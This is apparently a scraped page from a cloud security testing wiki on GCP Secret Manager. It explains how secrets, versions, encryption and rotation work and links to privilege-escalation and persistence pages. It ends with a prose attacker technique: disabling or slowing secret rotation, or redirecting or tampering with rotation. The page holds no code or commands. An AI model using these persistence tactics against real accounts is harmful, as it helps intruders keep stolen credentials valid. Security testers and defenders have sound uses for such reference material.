GCP - Secrets Manager Enum
Secret Manager
Google Secret Manager is a vault-like solution for storing passwords, API keys, certificates, files (max 64KB) and other sensitive data.
A secret can have different versions storing different data.
Secrets by default are encrypted using a Google managed key, but it's possible to select a key from KMS to use to encrypt the secret.
Regarding rotation, it's possible to configure messages to be sent to pub-sub every number of days, the code listening to those messages can rotate the secret.
It's possible to configure a day for automatic deletion, when the indicated day is reached, the secret will be automatically deleted.
Enumeration
Privilege Escalation
In the following page you can check how to abuse secretmanager permissions to escalate privileges.
GCP - Secretmanager PrivescPost Exploitation
GCP - Secretmanager Post ExploitationPersistence
GCP - Secret Manager PersistenceRotation misuse
An attacker could update the secret to stop rotations (so it won't be modified), or make rotations much less often (so the secret won't be modified) or to publish the rotation message to a different pub/sub, or modifying the rotation code being executed (this happens in a different service, probably in a Clound Function, so the attacker will need privileged access over the Cloud Function or any other service)
Last updated